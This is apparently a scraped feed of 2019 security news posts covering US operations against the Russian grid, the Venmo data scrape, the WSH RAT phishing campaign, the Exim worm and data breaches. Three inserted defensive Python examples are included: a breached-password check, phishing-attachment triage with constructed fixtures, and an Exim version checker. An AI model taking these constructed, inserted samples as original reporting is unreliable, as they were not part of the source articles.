The modern threat landscape is growing in sophistication and volume. As everything is becoming more digitized, there are more ways for bad actors to harm your company.

Here are some best practices that you can use to monitor your environment and combat threats:

Visibility is a key component to effective cybersecurity and monitoring. This includes having a good SOC and visibility into mobile users, remote workers, and business partners. The more you know about what’s happening on your network, including the cloud, the more effectively you can safeguard your environment.

Cyber hygiene and up-to-date security tools are necessities for businesses of all sizes.

  • Even if you’re a small or mid-size company, you can still have good security practices. You can have controls in place, outsource to a company, or work with your provider to get insight into your network. Microsoft Azure automatically gives you access to see what’s happening in your part of the cloud. Azure Security Center enables everybody to see what’s happening in a hybrid cloud environment. You don’t have to have a big cyber defense center to build good security practices.
  • Security solutions, such as Microsoft Threat Protection, provide multiple layers of threat protection across data, applications, devices, and identities and can help protect your company from advanced cyber threats. The security services in Microsoft Threat Protection, enriched by 6.5 trillion daily signals from the Microsoft Intelligent Security Graph, work together to mitigate today’s threats.

Get started

For more detail on actionable tips from security experts on how to recover after a data breach, watch the video, How to recover from a security breach.

The post How to recover from a security breach appeared first on Microsoft Security.

NYT: US Targets Russian Power Grid

After news broke that the US has ramped up its digital attacks on Russia, according to a New York Times article, President Trump tweeted that the story was a "virtual act of treason by a once great paper...ALSO, NOT TRUE.”

Though there are no details of the malware that was reportedly placed inside Russia’s power grid system, the NYT reported that National Security Presidential Memoranda 13, a classified document, grants the Department of Defense (DoD) the power to conduct offensive online operations without receiving presidential approval.

Specifically, General Paul Nakasone, commander of the US Cyber Command, holds that authority to make these decisions about offensive strategies. Without confirming that the DoD is taking more aggressive measures, House minority whip Steve Scalise told Meet the Press on June 16, “I'm glad the administration has been taking aggressive actions."

“An offensive cyber-strategy is a necessary component of a larger military and diplomatic strategy against a determined US adversary like Russia. After all, let’s not forget that Russia has been targeting US utilities for several years, at least,” said Carlos Perez, R&D practice lead at TrustedSec.

“US-CERT warned just last year about Russia’s cyber-operations against multiple US utilities. We’ve also seen Russia put these capabilities to real-world effect, as in the case of the two cyber-induced power outages that affected Ukraine. We have to take this threat seriously, and having a cyber-response ready to go is of paramount importance."

Perez clarified that the operations described by the New York Times also do not constitute cyber-war, nor do they exceed the legal restrictions set by our own government.  

"The Department of Defense Law of War Manual has codified cyber operations, which this current action falls within. As you’ll notice, these guidelines include such operational objectives as reconnaissance, acquiring and securing access to key systems, and implanting access tools into infrastructure for the purpose of acquiring foreign intelligence, gaining information about an adversary’s capabilities and gathering information to determine intent, just to name a few.”

While trying to avoid the risk of escalating the situation with Russia, Perez said that this action and others taken by US cyber-ops teams are aimed at preparing the battle space with Russia, so that the US will be ready at some future point, should direct action need to be taken.

“This is also about deterrence, as we are signaling to Russia that we have the technical means and capabilities and the will to use them if we have to. As for the risk of ending up in a full-scale cyber-war, the reality is that we have been close to it with several events that have happened but remained in an economic, intelligence and influence conflict with Russia, as well as other countries, like China, Iran and, to a lesser extent, North Korea. These are low-intensity conflicts but they could escalate at any point, even without us engaging in our own offensive cyber-ops.”

The 2019 Job Seeker & The Cybersecurity Skills Shortage

In today’s ever-changing job market, job seekers and employers alike are under a great deal of pressure. Those looking for their next career move are focusing on what’s required to land a great role with competitive compensation and room for growth in an exciting field. And employers are seeking a rising star that will be a good culture fit and have values that match those of their company.

A Letter to Jobseekers

Whether you just graduated college, left your previous role, or are seeking a different career path, you’re probably thinking, “Now what?” No matter where your path leads you, stay positive. Try to find a company that invests in you, truly wants you to succeed, fosters both personal and professional growth, and makes a big difference in your career progression.

If you’re a problem solver and love to learn, cybersecurity is the path for you. A career in cybersecurity can be very fulfilling. As cybercrime continues to rise, so will the demand for qualified cybersecurity professionals, offering both dynamic growth opportunities and job security. Furthermore, cybersecurity professionals are generally among the most highly compensated technology workers, and as the need for security professionals further outpaces the supply, salaries will continue to climb as companies compete for top talent. Lastly, a career in cybersecurity offers the sense of purpose that comes with making the world a better place by helping protect innocent people from cybercriminals.

Whether you are just out of the gate or further along in your career, check out McAfee CHRO Chatelle Lynch’s five powerful career tips: stay hungry, celebrate others’ success, work hard, own your brand, and take pride in everything you do.

Good luck!

A Sustainable Model for Cybersecurity Talent

The term “skills shortage” is all too familiar to those in the cybersecurity industry. A Cybersecurity Ventures report estimates there will be 3.5 million unfilled cybersecurity jobs by 2021. And as cloud platforms demand an increasingly complex set of cloud SecOps skills, the skills gap will continue to grow at an increasing clip.

Success requires fresh thinking and fresh perspectives. It’s time for the cybersecurity industry to redefine the minimum credentials for entry-level cybersecurity jobs and accept non-traditional sources of education. Instead of expecting to hire an experienced cybersecurity professional, more companies should consider accepting job applicants that will require upfront investment and training. According to our Winning the Game report, 92% of cybersecurity managers say gamers possess skills that make them suited to a career in cybersecurity—and 75% would consider hiring a gamer even if that person had no cybersecurity training or experience.

In order to grow security talent and close the skills gap, companies should also consider developing apprenticeship programs, investing and supporting cybersecurity and threat intelligence programs at universities, and other avenues. According to Lynch, “We won’t close our skills gap overnight, but by working together to collectively promote and advocate for a career in cybersecurity, the closer we will get.” We look forward to solving the cyber skills shortage together and driving innovation with diversity and inclusion.

Looking for a career in cybersecurity? Join our team.

The post The 2019 Job Seeker & The Cybersecurity Skills Shortage appeared first on McAfee Blogs.

Episode 516 – Listener Episode – InfoSec Work Life Balance

This episode came from a listener question about infosec work life balance. I speak about my experience and the landscape of different avenues in cybersecurity and what is on-call, what is not and how to navigate it. Be aware, be safe. Become A Patron! Patreon Page *** Support the podcast with a cup of coffee […]

The post Episode 516 – Listener Episode – InfoSec Work Life Balance appeared first on Security In Five.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

The U.S. cyber units have been targeting the Russian power grid since at least 2012 with reconnaissance operations, but recently they have also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”

The hacking operations aimed at warning the Russian Government about the cyber capabilities of the U.S. Cyber Command, which could be used as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that there is no evidence that the malware used by the US Cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT:

The New York Times added that, according to two US officials, Trump was not fully informed about cyber operations conducted by the US Cyber Command. High officials inside the US Cyber Command might have hidden the details of the cyber attacks inside the Russian power grid, fearing a possible reaction of the President due to his relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017 when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

Seven Million Venmo Transactions Published on GitHub

Venmo users are being advised to set their accounts to private after a computer science student scraped seven million Venmo transactions, proving that users’ public activity can be easily accessed, according to The Next Web (TNW).

Over a six-month period, Minnesota State University computer science student Dan Salmon collected a data set of more than seven million Venmo transactions, which he exported from MongoDB and published on GitHub.

“I am releasing this dataset in order to bring attention to Venmo users that all of this data is publicly available for anyone to grab without even an API key. There is some very valuable data here for any attacker conducting OSINT research,” Salmon wrote.

“I would highly encourage all users to switch their Venmo account to private by going to Settings > Privacy and selecting "Private" as well as Past Transactions > Change All to Private. Screenshot instructions are available here.”

"Transparency may often be used against the legitimate interests of end users. Probably very few of us wish to share all their payment transactions with the rest of the world even if we have nothing to hide. Venmo should explicitly and conspicuously notify all its users that their transactions are accessible by everyone unless they update their settings,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

“[The] developer’s API should be provided only to vetted, properly verified third parties within a scope of a binding legal agreement capable of protecting users’ privacy regardless of technical flaws one may discover now or in the future,” Kolochenko said.

“Anti-scraping functionality probably requires holistic testing via an open bug bounty program, for example, to spot and remediate as many anti-automation bypasses as possible. This will not provide absolute protection but at least will considerably reduce the efficiency of data-scraping campaigns. Without all these common-sense measures, Venmo may face serious legal ramifications and severe monetary penalties in many jurisdictions, let alone disgruntled users and loss of revenue."

In an email to Infosecurity, a Venmo spokesperson said, "Venmo was designed for sharing experiences with your friends in today’s social world, and the newsfeed has always been a big part of this. The safety and privacy of Venmo users and their information is always a top priority. 

"Venmo does a number of things to keep our users informed and help them protect and control their privacy, including:

  • "The social newsfeed: When people open the app, the first thing they see is the newsfeed. This is the first step in educating users that Venmo is a social forum and the newsfeed allows you to see what others have chosen to share on Venmo and the experiences that are happening on Venmo.
  • "Users choose what to share: Like on other social apps, Venmo users can choose what they want to share and which audience they share it with. It is very clear in each payment what audience it is being shared with and we have made this even more prominent in recent years."

Eliminate Outdated Identity Proofing, Says GAO

The remote identity proofing used by four large government agencies has been deemed outdated by a new report released by the U.S. Government Accountability Office (GAO).

According to the report, the Postal Service, Department of Veterans Affairs, Social Security Administration and the Centers for Medicare and Medicaid Services use outdated tactics to verify citizens’ data over the phone.

Of the six agencies GAO interviewed, only two have eliminated the use of knowledge-based verification methods. The remaining four government agencies rely on “consumer reporting agencies (CRAs) to conduct a procedure known as knowledge-based verification,” the report said. That is, individuals are asked questions based on information available in their credit reports.

As a result, any fraudster could potentially use information available from the 2017 Equifax breach or the latest hack of the week to answer security questions and start collecting social security checks of vulnerable Americans or embezzle veterans’ healthcare benefits.

“The risk that an attacker could obtain and use an individual’s personal information to answer knowledge-based verification questions and impersonate that individual led the National Institute of Standards and Technology (NIST) to issue guidance in 2017 that effectively prohibits agencies from using knowledge-based verification for sensitive applications,” the report said.

In addition to cost, agencies noted additional challenges to implementation, which include “mobile device verification[, which] may not always be viable because not all applicants possess mobile devices that can be used to verify their identities. Nevertheless, until these agencies take steps to eliminate their use of knowledge-based verification, the individuals they serve will remain at increased risk of identity fraud,” the report stated.

Beyond recommending that the agencies discontinue the practice of knowledge-based verification, the GAO also recommended that NIST augment its technical guidance with implementation guidance and assist agencies in adopting more secure authentication processes.

“It’s unfortunate that data breaches have become a part of our modern lives. But this report shows most of the damage isn’t done in the initial breach. In fact, most of the real damage comes from account takeovers by social engineering contact center agents long after the breach. Here’s the reality – hackers aren’t going away. The solution is to de-weaponize personal information. Stop relying on it for authentication,” said Pat Cox, VP and GM at Neustar.

“Identity interrogation and knowledge-based authentication, where citizens verify their identity by demonstrating knowledge of personal information, as basic as address or date of birth – information which could have been gleaned from dozens of recent data breaches – isn’t stopping identity theft."

Hackers Are After Your Personal Data – Here’s How to Stop Them

Our lives are increasingly digital. We shop, socialize, communicate, watch TV and play games — all from the comfort of our desktop, laptop, or mobile device. But to access most of these services we need to hand over some of our personal data. Whether it’s just our name and email address or more sensitive information like Social Security and credit card numbers, this sharing of what’s known as personally identifiable information (PII) exposes us to risk. Why? Because hackers are looking for ways to steal and monetize it.

The latest FBI Internet Crime Complaint Center (IC3) report, recently released, paints an accurate picture of the scale of these online threats. Personal data breaches were among the top reported cybercrimes in 2018, with 50,642 victims listed. They were linked to losses of over $148.8m. This is likely just the tip of the iceberg, as many incidents aren’t reported. Identity theft, which usually results from data theft, cost victims over $100m last year. And phishing attacks, which are commonly used to trick victims into handing over sensitive PII and passwords, accounted for over $48m in losses.

The message is clear: consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers. That’s why Trend Micro has produced this guide, to help you identify where your most sensitive data is stored, how attackers might try to steal it and how best to secure it.

What is at risk?

The bottom line is that hackers are out to make money. Although they can do this via online extortion and ransomware, it is most commonly done via data theft. Once they have your PII and financial details they sell it on dark web sites for fraudsters to use in follow-on identity fraud. They could use banking log-ins to hijack your bank account and drain it of funds. Or they could open new credit cards in your name and run up huge debts.

Identity fraud is a growing threat to US consumers. It affected 14.4m of us in 2018, leading to losses of $1.7bn — more than double the 2016 figure.

As we’ve mentioned, the hackers are after as much PII as they can get their hands on. The more they have, the easier it is for them to stitch together a convincing version of your identity to trick the organizations you interact with online. It could range from names, addresses and dates of birth at one end to more serious details like Social Security numbers, bank account details, card numbers, and health insurance details at the other.

Most of this information is stored in your online accounts, protected by a password, so they will often put a great deal of effort into guessing or stealing the all-important log-ins. Even accounts you might not think would be of interest to a hacker can be monetized. Access to your Uber account, for example, could be hijacked and sold online to offer free trips to the buyer. Or your Netflix account log-ins may be sold to provide free streaming services to whoever pays for them.

Now, hackers may go after the firms directly to steal your personal data. In the past we’ve seen mega breaches at the likes of Uber (affecting 57m global users) and Yahoo (affecting 3bn users). But they might also target you individually. Sometimes they may use information they already know about you to trick you via phishing into handing over more, as with tax fraud and sextortion blackmail attempts, and sometimes they might use already breached passwords to try and hack into your accounts, hoping you reuse the same log-ins across multiple sites.

While you’re most likely to get reimbursed by your bank eventually for financial losses stemming from identity fraud, there’s a major impact beyond this. Online data theft and the fraud that follows could lead to:

  • Out-of-pocket costs to recover your identity
  • Emotional distress: 75% of victims report suffering severe distress
  • Lower credit scores
  • Time and effort disputing charges/recouping money: it’s estimated to take an average of six months and 200 hours of work to recover your identity following an attack.

How do they steal it?

There are plenty of techniques the bad guys have at their disposal to part you from your data and money. They’re supported in this by a vast underground cybercrime economy, facilitated by those dark web sites. This not only offers a readymade platform for them to sell their stolen data to fraudsters, but also provides them with hacking tools, advice and cybercrime services. This black market economy could be worth as much as $1.5tr per year.

The hackers may choose to:

  • Target you with a phishing scam, spoofing an email to appear as if sent from an official company (the IRS, your bank, insurer, ISP etc.)
  • Launch automated attacks, either using your log-ins from other sites that have been stolen, or else using online tools to try multiple combinations of easy-to-guess passwords like “passw0rd”
  • Exploit vulnerabilities on the websites you visit to gain access to your account
  • Infect legitimate-looking mobile apps with malware and wait until you unwittingly download them
  • Intercept your private data sent over public Wi-Fi: for example, if you log in to your online banking account on public Wi-Fi, a hacker may be able to monitor everything you do.

How can I secure it?

The good news is that there are plenty of simple things you can do to keep your data safe and secure — most of them free of charge. Consider the following:

  • Use a long, strong and unique password for each website and application. To help you do this, use an online password manager to store and recall these log-ins when needed.
  • Change your passwords immediately if a provider tells you your account may have been breached
  • Use two-factor or multi-factor authentication (2FA/MFA) if available for added log-in security.
  • Only enter PII into sites which start with “HTTPS” in the address bar.
  • Don’t click on links or open attachments in unsolicited emails or texts.
  • Be careful about over-sharing personal and financial details on social media.
  • Only download apps from official app stores like the Apple App Store or Google Play.
  • Don’t access any sensitive accounts (banking, email etc.) on public Wi-Fi without using a VPN.
  • Invest in good AV from a trusted provider for all your PCs and mobile devices. It should include anti-phishing and anti-spam.
  • Keep all operating systems and apps on the latest versions to minimize the number of vulnerabilities hackers could target.
  • Keep tabs on your financial transactions so you can quickly spot if an identity fraudster has been impersonating you.
  • In the event of a breach involving your credit (as in the Equifax breach), check your credit report and security status from Equifax, TransUnion, Experian, and Innovis and put a security freeze on it if necessary.
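An added example (not Trend Micro's code) of how a site or password manager can check a password against a breach corpus without ever revealing it: the client hashes locally and sends only the first five hex characters of the SHA-1, the k-anonymity range scheme used by the Pwned Passwords API. `FakeRangeServer` and `CONSTRUCTED_CORPUS` are stand-ins so the script runs offline; the counts are made up.

```python
"""Breached-password check with k-anonymity: only a 5-character hash prefix
leaves the client, the server returns every suffix in that bucket, and the
full-hash comparison happens locally. Added example; the corpus and the
in-memory range server are constructed stand-ins for the real service."""
import hashlib
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample corpus standing in for a breach database.
# Counts are illustrative only.
CONSTRUCTED_CORPUS: Dict[str, int] = {
    "passw0rd": 1_000_000,
    "123456": 23_000_000,
    "qwerty": 3_900_000,
    "letmein": 250_000,
}

RangeLookup = Callable[[str], str]


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1, the hash form the range protocol works on."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_range_index(corpus: Dict[str, int]) -> Dict[str, List[Tuple[str, int]]]:
    """Server side: bucket every breached hash by its 5-hex-char prefix."""
    index: Dict[str, List[Tuple[str, int]]] = {}
    for password, count in corpus.items():
        digest = sha1_hex(password)
        index.setdefault(digest[:5], []).append((digest[5:], count))
    return index


class FakeRangeServer:
    """Offline stand-in for the range endpoint. Answers a 5-char prefix with
    every matching 35-char suffix and its count, CRLF separated, in the same
    shape as the real API. Records each request so a test can show that the
    client never disclosed more than the prefix."""

    def __init__(self, corpus: Dict[str, int]) -> None:
        self.index = build_range_index(corpus)
        self.requests: List[str] = []

    def __call__(self, prefix: str) -> str:
        if not re.fullmatch(r"[0-9A-F]{5}", prefix):
            raise ValueError("range lookups take exactly five hex characters")
        self.requests.append(prefix)
        rows = self.index.get(prefix, [])
        return "\r\n".join(f"{suffix}:{count}" for suffix, count in rows)


def breach_count(password: str, lookup: RangeLookup) -> int:
    """Client side: hash locally, send only the prefix, match the suffix here.
    Returns how many times the exact password appeared in the corpus, 0 if never."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in lookup(prefix).splitlines():
        if not line.strip():
            continue
        candidate, _, count = line.partition(":")
        if candidate.strip() == suffix:
            return int(count)
    return 0


if __name__ == "__main__":
    server = FakeRangeServer(CONSTRUCTED_CORPUS)
    for candidate in ("passw0rd", "uncorrelated-Zx9!quartz-lamp-42"):
        seen = breach_count(candidate, server)
        verdict = f"seen {seen} times, change it" if seen else "not in corpus"
        print(f"{candidate!r}: {verdict}")
    print("prefixes disclosed to the server:", server.requests)
```

Against the real service the lookup would be an HTTPS GET of `/range/<prefix>`; everything else in the client stays the same.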

The post Hackers Are After Your Personal Data – Here’s How to Stop Them appeared first on .

How Safe Is Your Endpoint From Cyber Attack

In the current business environment, any device that can connect to a network is termed an “endpoint”: desktops, laptops, tablets, smartphones and, more recently, IoT devices. As devices evolve, threats keep pace. Unfortunately, today’s firewalls and antivirus are not strong enough to cope with the ever-changing environment of a business. Endpoints are now exposed to ransomware, phishing, malicious advertisements, software subversion, and other attacks. Not to mention that attackers use zero-day attacks, which exploit previously unknown vulnerabilities, to deliver malicious programs to endpoint computers.

How do today’s businesses protect against these malicious threats? First, before choosing the right Endpoint Protection (EPP) platform, companies need to gain a deeper knowledge of “endpoints”.

Unknown files that trigger the change

According to a recent study by Comodo Cybersecurity, over the past five years the number of unknown files (potentially malicious, unrecognized executables) has exploded. Every day, more than 300,000 malicious files are detected. Managing new or unknown files is one of the most important features of an EPP.

Most EPP products use a trust-based assumption, called a ‘default allow posture’, for new or unknown files. Under this posture, any file that is not already known to be bad is treated as good and is allowed to run with full privileges, including write access to system files. As you can imagine, one of the biggest problems with the “default allow” posture is that cybercriminals are constantly developing new variants to avoid detection on the endpoints. This can expose companies to threats for days, weeks, or even months before they are detected.

Sandbox and beyond

In order to successfully fight cyber criminals, many EPP vendors have integrated sandbox technology into their products to combat malicious software. For those who are unfamiliar, the sandbox is an isolated virtual environment that mimics the endpoint operating environment to safely run unknown files without the risk of damaging host or network devices.

This solution is gradually losing its effectiveness. Cybercriminals create threats that can detect when a sandbox is being used and automatically take action to prevent detection. In addition, sandboxes are becoming increasingly resource intensive and complex, slowing down their ability to handle threats without compromising productivity.

The Need for a Zero Trust Architecture

As cybercriminals are using the Default Allow approach to their benefit, while also modifying these variants to bypass sandboxes, companies need a better solution. The obvious answer is to adopt a Zero Trust architecture, where unknown executables are never trusted and always verified, without impacting user productivity. To successfully achieve a Zero Trust architecture, 100% of unknown files must be instantly contained and analyzed in the cloud and by humans to prevent breaches. Additionally, the business still needs to operate, and users should not have to experience productivity loss or impact. Successfully achieving a Zero Trust architecture will bulletproof your business from damage.

Best Practices for Evaluating EPP

Protecting endpoints from malicious software is one of the most important aspects of securing a company’s IT resources. Endpoint protection must be part of a holistic IT security approach in which perimeter network security solutions secure the boundary between internal networks and service provider networks, and endpoint security further reduces the risk of threats or malicious activity affecting IT operations.

The first step in choosing an EPP solution is evaluating the needs of the business, which should include capacity and scalability, compliance, budget, and policies. The next step is to closely examine the capabilities, which should include, but are not limited to, centralized management, threat detection and blocking, unknown file handling, file reputation scoring and support for achieving a Zero Trust architecture.

Choosing the right EPP

In addition to these best practices, Gartner recently released a research paper that strongly recommends that security and risk managers conduct a thorough proof of concept to accurately determine which endpoint protection platform is the best fit.

The post How Safe Is Your Endpoint From Cyber Attack appeared first on .

New phishing campaign targets bank customers with WSH RAT

Security researchers at Cofense have spotted a phishing campaign aimed at commercial banking customers distributing a new remote access trojan (RAT) tracked as WSH RAT.

Security experts at Cofense Phishing Defence Center have spotted a phishing campaign aimed at commercial banking customers that is distributing a new remote access trojan tracked as WSH RAT.

The name WSH likely refers to the legitimate Windows Script Host, which is an application used to execute scripts on Windows machines.

Threat actors are using the RAT to deliver keyloggers and information stealers.

“The Cofense Phishing Defense Center™ (PDC) and Cofense Intelligence™ have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files.” reads the analysis published by Cofense. “This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing.”

WSH Remote Access Tool (RAT) is a variant of the VBScript-based Houdini Worm (H-Worm), which first appeared in the threat landscape in 2013 and was updated in 2016.

WSH RAT differs from Houdini in that it is written in JavaScript and uses a different User-Agent string and a different delimiter character when communicating with its command-and-control (C2) server.

The phishing messages carry an MHT file containing an href link; when the file is opened and the link followed, the victim is taken to a .zip archive containing a copy of WSH RAT.

WSH RAT attack

The RAT allows attackers to steal sensitive data, including passwords from the victims’ browsers and email clients, and implements keylogging. The experts pointed out that it also gives the operator remote control of the victim’s system, can kill anti-malware solutions and can disable Windows UAC.

The authors of the malware are renting out WSH RAT: buyers pay a subscription fee of $50 per month to use all the features they have implemented.

“WSH RAT is being sold for $50 USD a month and has an active marketing campaign.” continues the post. “The threat operators tout the RAT’s many features such as WinXP-Win10 compatibility, several automatic startup methods, and a large variety of remote access, evasion, and stealing capabilities.”

Once WSH RAT has reached its C2 server, it downloads and drops three additional files with a .tar.gz extension that are actually PE32 executables.

The three downloaded payloads are a keylogger, a mail credential viewer and a browser credential viewer. All three are third-party tools, not developed by the WSH RAT operator, and are used by the campaign operators to collect credentials and other sensitive information.
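Two triage checks for the delivery chain described above, written as an added example (this is not Cofense’s code nor anything from the RAT): the first pulls the href links out of an MHT attachment and flags the ones pointing at archives, the second checks whether a dropped file’s magic bytes agree with its extension, the way a “.tar.gz” that is really a PE32 would not. The MHT body and file names are constructed for the example; the hostname uses the reserved .invalid TLD and is not an indicator from the campaign.

```python
"""Added example: MHT link extraction and extension/magic mismatch checks."""
import email
import email.policy
import re
from typing import List, Optional, Tuple

ARCHIVE_EXTS = (".zip", ".rar", ".7z", ".iso", ".tar.gz", ".gz")
HREF_RE = re.compile(r"""href\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def links_in_mht(mht_bytes: bytes) -> List[str]:
    """Every href in the HTML parts of an MHT (MIME multipart/related) file.
    The email package decodes quoted-printable and base64 bodies for us."""
    msg = email.message_from_bytes(mht_bytes, policy=email.policy.default)
    links: List[str] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        links.extend(HREF_RE.findall(part.get_content()))
    return links


def archive_links(mht_bytes: bytes) -> List[str]:
    """Links whose path ends in an archive extension, the hop used here to fetch the RAT."""
    return [u for u in links_in_mht(mht_bytes)
            if u.split("?", 1)[0].lower().endswith(ARCHIVE_EXTS)]


# Magic bytes tell what a dropped file really is, whatever its name claims.
MAGIC: List[Tuple[bytes, str]] = [
    (b"MZ", "pe"),            # Windows PE executable
    (b"\x1f\x8b", "gzip"),    # what a real .tar.gz starts with
    (b"PK\x03\x04", "zip"),
]
EXT_TYPE = {".tar.gz": "gzip", ".gz": "gzip", ".zip": "zip", ".exe": "pe", ".dll": "pe"}


def content_type(data: bytes) -> Optional[str]:
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def extension_mismatch(filename: str, data: bytes) -> Optional[Tuple[str, str]]:
    """(claimed, actual) when extension and magic bytes disagree, else None."""
    name = filename.lower()
    claimed = next((t for ext, t in EXT_TYPE.items() if name.endswith(ext)), None)
    actual = content_type(data)
    if claimed is None or actual is None or claimed == actual:
        return None
    return claimed, actual


# Constructed MHT: one quoted-printable HTML part, as a browser "save as web archive" writes it.
SAMPLE_MHT = b"""MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_Part_0"

------=_Part_0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<html><body><a href=3D"http://invoice.example.invalid/statement.zip">Open=
 statement</a> <a href=3D"http://invoice.example.invalid/help.html">help</a>
</body></html>
------=_Part_0--
"""

if __name__ == "__main__":
    print("archive links:", archive_links(SAMPLE_MHT))
    # A constructed "payload": PE header bytes under a .tar.gz name.
    print("mismatch:", extension_mismatch("kl.tar.gz", b"MZ\x90\x00\x03\x00\x00\x00"))
```

Run the second check over everything a suspect host downloaded in the incident window; a PE behind an archive extension is a cheap, high-signal triage hit, and the same idea extends to Office documents (OLE/zip magic) renamed to anything else.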

“This re-hash of Hworm proves that threat operators are willing to re-use techniques that still work in today’s IT environment. The phishing campaign that delivered the .zip containing a MHT file was able to bypass the Symantec Messaging Gateway’s virus and spam checks.” continues the post.

Experts published a list of indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – WSH Remote Access Trojan, hacking)

The post New phishing campaign targets bank customers with WSH RAT appeared first on Security Affairs.

Microsoft Urges Azure Customers to Patch Exim Worm

Microsoft has urged Azure users to update their systems following the discovery of a major new attack campaign targeting popular email server software.

The worm, which Infosecurity reported on last week, targets the mail transfer agent Exim running on Linux-based email servers. Exim is claimed to run on over half (57%) of the world’s email servers, with as many as 3.5 million of them vulnerable to the new attack.

In a security update on Friday, Microsoft confirmed that the attack imperils servers running Exim version 4.87 to 4.91. It said that although Azure has “controls” in place to prevent the spread of the worm, customers could still be vulnerable to infection and should update their systems as soon as possible.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim,” Microsoft explained.

“There is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs). The affected systems can mitigate Internet-based ‘wormable’ malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker’s IP Address is permitted through Network Security Groups.”
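A quick way to answer “is this VM in the affected range?” for the 4.87 to 4.91 versions named above, as an added example (not Microsoft’s or Exim’s code): it parses the first line of `exim -bV` output, which on Debian-derived systems is `exim4 -bV`. The sample output is constructed. One caveat: distributions often backport the fix without bumping the version string, so a host that this reports as affected should also be checked against the package changelog before anyone raises an alarm; the upstream fix shipped in 4.92.

```python
"""Added example: classify an Exim version against the 4.87-4.91 range in the advisory."""
import re
import subprocess
from typing import Optional, Tuple

AFFECTED_MIN = (4, 87)   # inclusive range quoted from Microsoft's update
AFFECTED_MAX = (4, 91)
VERSION_RE = re.compile(r"^Exim version (\d+)\.(\d+)", re.MULTILINE)


def parse_exim_version(bv_output: str) -> Optional[Tuple[int, int]]:
    """(major, minor) from `exim -bV` output, or None if no version line is found."""
    m = VERSION_RE.search(bv_output)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_affected(version: Tuple[int, int]) -> bool:
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def assess(bv_output: str) -> str:
    v = parse_exim_version(bv_output)
    if v is None:
        return "unknown: could not parse an Exim version"
    if is_affected(v):
        return f"affected: Exim {v[0]}.{v[1]} is within 4.87-4.91; patch or restrict port 25"
    return f"not in range: Exim {v[0]}.{v[1]}"


def assess_local_host() -> str:
    """Try the binary names used upstream and on Debian/Ubuntu."""
    for binary in ("exim", "exim4"):
        try:
            out = subprocess.run([binary, "-bV"], capture_output=True,
                                 text=True, timeout=10).stdout
        except (FileNotFoundError, subprocess.TimeoutExpired):
            continue
        return assess(out)
    return "unknown: no exim binary found"


# Constructed sample of `exim -bV` output for an affected build.
SAMPLE_BV = """Exim version 4.89 #1 built 14-Dec-2017 15:25:55
Copyright (c) University of Cambridge, 1995 - 2017
"""

if __name__ == "__main__":
    print(assess(SAMPLE_BV))
    print(assess_local_host())
```

The NSG mitigation Microsoft describes complements this: restricting inbound TCP/25 to known peers stops the worm’s Internet-wide scanning from reaching the VM, but as the quote says it does nothing against an attacker who is already allowed through, so the version check above is the one that decides whether patching can wait.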

Two waves of attack have been spotted in the wild, downloading a cryptocurrency mining payload to monetize the threat. The more sophisticated of the two uses Tor services and creates “deceiving windows icon files” to throw security teams off the scent.

As well as downloading the payload, the malware searches for additional vulnerable servers on the internet, connects to them, and infects them with the initial script, according to Cybereason.

Oregon State University (OSU) Discloses Data Breach

Oregon State University (OSU) has disclosed a security incident that potentially affected the personally identifiable information of some students and their families. On 14 June, OSU announced that the security incident occurred back in May when external actors hacked a university employee’s email account. At the time of compromise, the email account contained the personal […]

The post Oregon State University (OSU) Discloses Data Breach appeared first on The State of Security.

Data, Surveillance, and the AI Arms Race

